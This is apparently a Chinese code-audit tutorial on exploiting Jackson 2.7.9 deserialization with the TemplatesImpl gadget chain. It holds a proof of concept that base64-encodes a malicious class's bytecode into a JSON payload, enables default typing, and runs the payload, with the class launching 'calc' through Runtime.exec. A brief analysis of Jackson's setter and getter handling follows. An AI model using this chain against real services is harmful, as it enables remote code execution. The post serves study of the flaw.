0x00 前言

Jackson 相对应fastjson来说利用方面要求更加苛刻，默认情况下无法进行利用。

同样本次的调用链也可以参考fastjson内容：Java代码审计——Fastjson TemplatesImpl调用链

相关原理，可以参考：Jackson 反序列化漏洞原理

0x01 环境搭建

pom文件如下

    <dependencies><dependency><groupId>com.fasterxml.jackson.dataformat</groupId><artifactId>jackson-dataformat-xml</artifactId><version>2.7.9</version></dependency><dependency><groupId>org.javassist</groupId><artifactId>javassist</artifactId><version>3.19.0-GA</version></dependency></dependencies>

测试Demo：

 ClassPool classPool = ClassPool.getDefault();CtClass ctClass = classPool.getCtClass("com.evil");byte[] bytes = ctClass.toBytecode();String encoded = Base64.encode(bytes);String json = "{\"object\":[\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",{" +"\"transletBytecodes\":[\""+encoded+"\"]," +"\"transletName\":\"cs\"," +"\"outputProperties\":{}" +"}]}";System.out.printf(json);ObjectMapper mapper = new ObjectMapper();mapper.enableDefaultTyping();mapper.readValue(json, People.class);}

evil文件

public class evil extends AbstractTranslet {public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {}public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public evil() throws IOException {Runtime.getRuntime().exec("calc");}public static void main(String[] args) throws IOException {evil obj = new evil();}
}

其他环境

• jdk 1.7u2

0x02 漏洞复现

0x03 原理分析

主要原理就是需要调用指定类的setter方法来进行赋值，这个没有什么好解释的，主要是看一下Jackson是如何触发Getter的。

setter和getter可以参考：Java中动态调用setter以及getter

重点在循环遍历的位置：

jackson-databind-2.7.9.jar!\com\fasterxml\jackson\databind\deser\BeanDeserializer.class#vanillaDeserialize

当存在set方法的时候就调用 jackson-databind-2.7.9.jar!\com\fasterxml\jackson\databind\deser\impl\FieldProperty.class，就会触发set方法

当不存set方法的时候就会调用jackson-databind-2.7.9.jar!\com\fasterxml\jackson\databind\deser\impl\SetterlessProperty.class

实际上fastjson的调用链，jackson基本都是可以用的

以上